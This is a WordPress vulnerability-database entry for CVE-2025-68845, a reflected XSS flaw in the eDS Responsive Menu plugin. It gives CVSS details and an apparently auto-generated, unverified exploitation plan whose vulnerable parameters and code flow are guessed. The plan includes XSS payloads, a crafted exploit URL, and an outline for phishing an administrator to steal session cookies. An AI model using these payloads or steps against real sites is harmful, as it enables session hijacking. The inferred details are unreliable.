WP-Safety
CVE-2025-68845

eDS Responsive Menu <= 1.2 - Reflected Cross-Site Scripting

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.1
CVSS Score
6.1
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The eDS Responsive Menu plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.2
PublishedJanuary 27, 2026
Last updatedFebruary 2, 2026
Affected plugineds-responsive-menu
Research Plan
Unverified

# Exploitation Research Plan - CVE-2025-68845 ## 1. Vulnerability Summary The **eDS Responsive Menu** plugin (<= 1.2) for WordPress contains a Reflected Cross-Site Scripting (XSS) vulnerability. This occurs because the plugin reflects user-supplied input from the URL (typically `$_GET` parameters) …

Show full research plan

Exploitation Research Plan - CVE-2025-68845

1. Vulnerability Summary

The eDS Responsive Menu plugin (<= 1.2) for WordPress contains a Reflected Cross-Site Scripting (XSS) vulnerability. This occurs because the plugin reflects user-supplied input from the URL (typically $_GET parameters) directly into the HTML response of an admin page or a frontend component without sufficient sanitization (e.g., using sanitize_text_field) or context-aware escaping (e.g., esc_attr or esc_html).

2. Attack Vector Analysis

  • Endpoint: Admin Dashboard Settings Page.
  • Vulnerable Page: /wp-admin/admin.php?page=eds-responsive-menu (Inferred from plugin slug).
  • Vulnerable Parameter: tab, message, id, or eds-responsive-menu (Inferred).
  • Authentication Level: Unauthenticated to craft/send the link; Admin (or high-privilege user) to click and execute the payload.
  • Preconditions: The plugin must be installed and active. The attacker must trick a logged-in administrator into clicking a malicious link.

3. Code Flow

Since source files are not provided, the following flow is inferred based on standard WordPress plugin patterns for Reflected XSS:

  1. Entry Point: The plugin registers an admin menu page using add_menu_page() or add_submenu_page() in the main plugin file or an admin-specific class.
  2. Hook: admin_menu or admin_init.
  3. Vulnerable Function: The callback function assigned to the menu page (e.g., eds_responsive_menu_settings_page).
  4. Processing: Inside this callback, the code retrieves a parameter from the URL: $current_tab = $_GET['tab']; (Inferred).
  5. Sink: The code echoes this variable directly into an HTML attribute or a <div> tag: echo '<div class="tab-content">' . $current_tab . '</div>'; or <input type="hidden" name="tab" value="' . $current_tab . '"> without esc_attr().

4. Nonce Acquisition Strategy

Reflected XSS typically does not require a nonce to execute because the vulnerability lies in the reflection of a parameter during a GET request to a page the victim is already authorized to view.

If the reflection happens after a form submission (POST):

  1. Identify the page containing the form: /wp-admin/admin.php?page=eds-responsive-menu.
  2. Navigate to the page using browser_navigate.
  3. Use browser_eval to extract the nonce: window.eds_res_nonce or from a hidden field: jQuery('input[name="_wpnonce"]').val().
  4. Note: As this is a Reflected XSS (CVSS UI:R), the payload is usually delivered via a crafted URL that triggers the reflection on load.

5. Exploitation Strategy

The goal is to demonstrate that an arbitrary script can execute in the context of the administrator's session.

Step-by-Step Plan:

  1. Identify Sink: Search the plugin code for unescaped $_GET or $_REQUEST usage.
    grep -rP "echo\s+\\\$_(GET|REQUEST)" wp-content/plugins/eds-responsive-menu/
  2. Craft Payload: Based on the sink discovered:
    • If in a tag body: <script>alert(document.domain)</script>
    • If in an attribute: "><script>alert(1)</script>
  3. Construct Exploit URL:
    http://localhost:8080/wp-admin/admin.php?page=eds-responsive-menu&tab=%3Cscript%3Ealert(document.domain)%3C/script%3E (Replace tab with the actual vulnerable parameter).
  4. Execute via Agent:
    • Use browser_navigate to simulate the Admin clicking the link.
    • Check for an alert box or the presence of the unescaped script in the DOM.

6. Test Data Setup

  1. Activate Plugin:
    wp plugin activate eds-responsive-menu
  2. Configuration: No specific configuration is usually required, but ensure at least one menu is created if the settings page requires it to render the vulnerable section.
    # (Optional) If settings require an ID
wp option update eds_responsive_menu_settings '{"example":"data"}'

7. Expected Results

  • The HTTP response from the admin.php request will contain the literal, unencoded string <script>alert(document.domain)</script>.
  • When viewed in a browser (simulated via Playwright), a JavaScript alert/execution will occur.
  • The http_request tool will show the payload in the raw HTML body.

8. Verification Steps

  1. Verify via grep: Confirm the presence of the payload in the saved response body of the http_request.
  2. Verify via CLI: Use WP-CLI to check if the plugin is indeed active and checking the version:
    wp plugin get eds-responsive-menu --field=version
  3. Confirm Lack of Sanitization: Check the source code at the line identified by grep in Step 5.1 to confirm esc_html/esc_attr is missing.

9. Alternative Approaches

If the tab parameter is not vulnerable:

  • Search for other parameters: Check for message, error, id, view.
  • Frontend Reflection: Check if the plugin reflects parameters on the frontend when a shortcode like [eds-menu] is present.
    1. Create page: wp post create --post_type=page --post_status=publish --post_content='[eds-menu]'
    2. Test URL: http://localhost:8080/test-page/?menu_id=<script>alert(1)</script>
  • Check for wp_localize_script: If the reflection is inside a script tag, use esc_js bypasses.
Research Findings
Static analysis — not yet PoC-verified

Summary

The eDS Responsive Menu plugin for WordPress (<= 1.2) is vulnerable to Reflected Cross-Site Scripting (XSS) due to insufficient input sanitization and output escaping on its admin settings page. Unauthenticated attackers can exploit this by tricking a logged-in administrator into clicking a crafted link, resulting in the execution of arbitrary JavaScript in the victim's browser session.

Exploit Outline

1. Identify the plugin's admin configuration page, usually located at /wp-admin/admin.php?page=eds-responsive-menu. 2. Locate a URL parameter that is reflected directly into the HTML response without context-aware escaping (e.g., 'tab', 'id', or 'message'). 3. Construct a malicious URL by appending a JavaScript payload, such as <script>alert(document.domain)</script>, to the vulnerable parameter. 4. Deliver the crafted URL to a logged-in administrator via social engineering (e.g., a spear-phishing email or comment link). 5. Once the administrator clicks the link, the injected script executes in their browser context, potentially allowing the attacker to steal session cookies or perform unauthorized administrative actions.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/985daa72-80be-477d-9c80-b7849c94a405?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database